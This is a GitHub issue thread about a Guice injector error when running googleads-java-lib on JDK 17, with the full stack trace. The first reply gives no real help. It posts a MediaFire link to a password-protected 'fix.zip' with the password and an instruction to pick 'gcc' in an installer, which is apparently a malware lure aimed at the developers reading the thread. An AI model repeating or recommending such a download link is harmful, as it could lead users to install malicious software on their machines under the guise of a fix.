### ISSUE TITLE
Issue while running on JDK 17

### ISSUE THREAD

**Issue by ChrisBafaro** [googleads/googleads-java-lib#279]
Hi,

We are having the following issue while running on JDK 17.

How can we fix this error? We are using it in our Mule application while running on the latest version of the dependencie.

```
"Invocation of static Method 'getOrderId(java.lang.String,java.lang.String,java.lang.String,java.lang.String)' from Class 'admanager.axis.v202408.approveorders' with arguments [java.lang.String orderId, java.lang.String networkCode, java.lang.String applicationName, java.lang.String filePath] resulted in an error.
Expected arguments are [java.lang.String orderId, java.lang.String networkCode, java.lang.String applicationName, java.lang.String filePath].
Cause: com.google.inject.CreationException - Unable to create injector, see the following errors:



1) [Guice/ErrorInjectingConstructor]: ExceptionInInitializerError
  at AdsAxisEngineConfigurationFactory.<init>(AdsAxisEngineConfigurationFactory.java:34)
  while locating AdsAxisEngineConfigurationFactory
  at AxisHandler.<init>(AxisHandler.java:56)
      \_ for 1st parameter
  while locating AxisHandler
  at AxisModule.configure(AxisModule.java:59)
      \_ installed by: AdManagerAxisModule -> AxisModule
  while locating SoapClientHandlerInterface



Learn more:

  https://github.com/google/guice/wiki/ERROR_INJECTING_CONSTRUCTOR



1 error

======================
Full classname legend:
======================
AdManagerAxisModule:               "com.google.api.ads.admanager.axis.AdManagerAxisModule"
AdsAxisEngineConfigurationFactory: "com.google.api.ads.common.lib.soap.axis.conf.AdsAxisEngineConfigurationFactory"
AxisHandler:                       "com.google.api.ads.common.lib.soap.axis.AxisHandler"
AxisModule:                        "com.google.api.ads.common.lib.soap.axis.AxisModule"
SoapClientHandlerInterface:        "com.google.api.ads.common.lib.soap.SoapClientHandlerInterface"
========================
End of classname legend:
========================
 [Not accessible. Value obtained from method: getDetailedDescription()]"
```

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChrisBafaro** [comment]
@qlqw233 what is this this fix?
